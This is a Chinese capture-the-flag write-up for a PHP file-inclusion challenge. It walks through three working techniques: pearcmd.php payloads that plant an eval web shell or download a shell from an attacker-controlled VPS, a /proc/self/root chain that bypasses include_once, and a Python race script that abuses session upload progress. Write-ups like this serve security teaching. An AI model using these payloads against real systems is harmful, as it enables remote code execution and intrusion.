MyPage

打开后给了一个参数file。尝试使用php伪协议读取index.php的源码，发现无法读取。

解法一：pearcmd.php文件包含

使用条件：
1.安装了pear拓展
2.register_argc_argv已开启

原理：

由pearcmd.php中的一段代码：

public static function readPHPArgv()
{global $argv;if (!is_array($argv)) {if (!@is_array($_SERVER['argv'])) {if (!@is_array($GLOBALS['HTTP_SERVER_VARS']['argv'])) {$msg = "Could not read cmd args (register_argc_argv=Off?)";return PEAR::raiseError("Console_Getopt: " . $msg);}return $GLOBALS['HTTP_SERVER_VARS']['argv'];}return $_SERVER['argv'];}return $argv;
}

可以知道pearcmd.php是通过$_SERVER['argv']来获取参数的。

对于传入$_SERVER['argv']的参数，+起到分隔作用，比如传入 1+1 实际上得到的是 1 1。

因为$_SERVER['argv']是可控的，所有可以利用pear命令来进行漏洞利用。

(1) config-create

该命令有两个参数，可以将第一个参数的内容写入第二个参数路径的文件中。

payload:

?+config-create+/&file=/user/local/lib/php/pearcmd.php&/<?=@eval($_POST['shell']);?>+/tmp/shell.php

注意：？后面的第一个+不能省略，否则会报错。

根据回显结果可以知道 /&file=/user/local/lib/php/pearcmd.php&/<?=@eval($_POST['shell']);?> 整个被当作参数传入了命令行，而且file被当作get参数正常执行了，也就是说pearcmd.php被包含了进来，因为php没有严格执行RFC3875，所以即使存在 = 也可以正常传入$_SERVER['argv']中。

因为 <?=@eval($_POST['shell']);?> 被写入了 /tmp/shell.php 中，所以可以让 file=/tmp/shell.php 来把shell.php包含进来，然后就可以用antsword连接了。

(2) install

这个命令可以从自己的服务器中下载php文件到靶机上。

payload:

?+install+--installroot+&file=/usr/local/lib/php/pearcmd.php&+http://[vps]:[port]/shell.php

解法二：/proc绕过include_once()

php的文件包含机制是将已经包含的文件与文件的真实路径放进哈希表中，正常情况下，PHP会将用户输入的文件名进行resolve，转换成标准的绝对路径，这个转换的过程会将…/、./、软连接等都进行计算，得到一个最终的路径，再进行包含。如果软连接跳转的次数超过了某一个上限，Linux的lstat函数就会出错，导致PHP计算出的绝对路径就会包含一部分软连接的路径，也就和原始路径不相同的，即可绕过include_once限制。

payload：

php://filter/read=convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/cwd/flag.php

/proc/self/root 代表跳转到根目录 /

/proc/self/cwd 返回当前文件所在目录

经过测试21个到30个 /proc/self/root 都可以成功读取到 flag.php

解法三：session.upload_progress与Session文件包含

利用条件：
1.目标环境开启了session.upload_progress.enable选项
2.发送一个文件上传请求，其中包含一个文件表单和一个名字是PHP_SESSION_UPLOAD_PROGRESS字段

原理：

可以上传含有所需内容的session文件，然后利用条件竞争的方法利用该session文件。

脚本：

import threading
import requests
from concurrent.futures import ThreadPoolExecutor, waittarget = 'http://43.142.108.3:28104/'
session = requests.session()
flag = 'helloworld'def upload(e: threading.Event):files = [('file', ('load.png', b'a' * 40960, 'image/png')),]data = {'PHP_SESSION_UPLOAD_PROGRESS': rf'''<?php file_put_contents('/tmp/success', '<?=phpinfo()?>'); echo('{flag}'); ?>'''}while not e.is_set():requests.post(target,data=data,files=files,cookies={'PHPSESSID': flag},)def write(e: threading.Event):while not e.is_set():response = requests.get(f'{target}?file=/tmp/sess_{flag}',)if flag.encode() in response.content:e.set()if __name__ == '__main__':futures = []event = threading.Event()pool = ThreadPoolExecutor(15)for i in range(10):futures.append(pool.submit(upload, event))for i in range(5):futures.append(pool.submit(write, event))wait(futures)

参考文章

Docker PHP裸文件本地包含综述 - 跳跳糖 (tttang.com)

Proc 目录在 CTF 中的利用-安全客 - 安全资讯平台 (anquanke.com)